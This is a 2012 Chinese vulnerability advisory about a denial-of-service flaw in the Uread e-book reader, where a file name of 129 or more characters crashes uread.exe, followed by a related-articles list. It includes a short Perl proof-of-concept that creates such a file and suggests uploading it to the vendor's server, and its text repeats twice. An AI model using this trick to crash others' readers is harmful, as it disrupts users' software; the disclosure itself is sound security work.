Uread閱讀器拒絕服務(wù)漏洞的分析與解決
發(fā)布時間:2012-07-04 14:35:54 作者:佚名
我要評論

Uread閱讀器在遠程或本地打開文件名過長(大于或等于129個字符)的upub等文件時將引起uread.exe程序無法正常工作,必須重新啟動uread.exe進程方可。
Uread閱讀器在遠程或本地打開文件名過長(大于或等于129個字符)的upub等文件時將引起uread.exe程序無法正常工作,必須重新啟動uread.exe進程方可。
遠程攻擊者可考慮將過長文件名的文件上傳至“至善讀書”的服務(wù)器端,實現(xiàn)遠程拒絕服務(wù)攻擊。
測試證明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修復(fù)方案:
目前廠商還沒有提供補丁或者升級程序。
作者 demonalex
遠程攻擊者可考慮將過長文件名的文件上傳至“至善讀書”的服務(wù)器端,實現(xiàn)遠程拒絕服務(wù)攻擊。
測試證明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修復(fù)方案:
目前廠商還沒有提供補丁或者升級程序。
作者 demonalex
相關(guān)文章
DedeCMS全版本通殺SQL注入漏洞利用代碼及工具2014年2月28日
近日,網(wǎng)友在dedecms中發(fā)現(xiàn)了全版本通殺的SQL注入漏洞,目前官方最新版已修復(fù)該漏洞,大家早點去官方下載補丁2014年2月28日2014-02-28路由器、交換機及防火墻漏洞的發(fā)現(xiàn)與防范方法
在本文中,我們將探討為什么這些設(shè)備容易受到攻擊,現(xiàn)在有多少惡意網(wǎng)絡(luò)攻擊是瞄準路由器、交換機和防火墻的以及企業(yè)應(yīng)該采取什么措施來保護其網(wǎng)絡(luò)2013-12-11- 最近看到網(wǎng)上曝出的dedecms最新版本的一個注入漏洞利用,漏洞PoC和分析文章也已在網(wǎng)上公開.但是在我實際測試過程當中,發(fā)現(xiàn)無法復(fù)現(xiàn)2013-06-11
nginx+cgi解析php容易出現(xiàn)的漏洞的分析
本文簡要的分析nginx+cgi解析php容易出現(xiàn)的漏洞2012-10-25- 我們來分析一下163郵箱記事本存儲型Xss漏洞分析與補救措施2012-10-23
- 偶爾在網(wǎng)上看到這些,拿來和大家一塊看看,也好讓各個站長懂得保護自己的網(wǎng)站2012-10-16
微軟發(fā)布Fix it工具修復(fù)IE7/8/9漏洞 ie用戶請盡快修復(fù)(0day漏洞)
日前有安全機構(gòu)曝光了IE瀏覽器的一個0day漏洞,利用這個0day漏洞(CVE-2012-4681)攻擊者可以繞過Windows的ASLR(地址空間布局隨機化)防護機制,訪問用戶曾訪問過的計算機2012-09-20網(wǎng)站的九大敵人有哪些 千萬別給Web應(yīng)用漏洞可趁之機
過去,網(wǎng)站的內(nèi)容大多是靜態(tài)的。隨著HTML5的流行,Web應(yīng)用進入一個嶄新階段,內(nèi)容的動態(tài)化和實時共享讓阻攔不良內(nèi)容或惡意軟件變得更加復(fù)雜,公司和個人的重要信息也被暴于2012-08-23WEBSHELL箱子系統(tǒng)V1.0收信箱子代碼漏洞分析及解決方法
來分析一下WEBSHELL箱子系統(tǒng)的漏洞2012-08-17- 過去,網(wǎng)站的內(nèi)容大多是靜態(tài)的。隨著HTML5的流行,Web應(yīng)用進入一個嶄新階段,內(nèi)容的動態(tài)化和實時共享讓阻攔不良內(nèi)容或惡意軟件變得更加復(fù)雜,公司和個人的重要信息也被暴于2012-08-09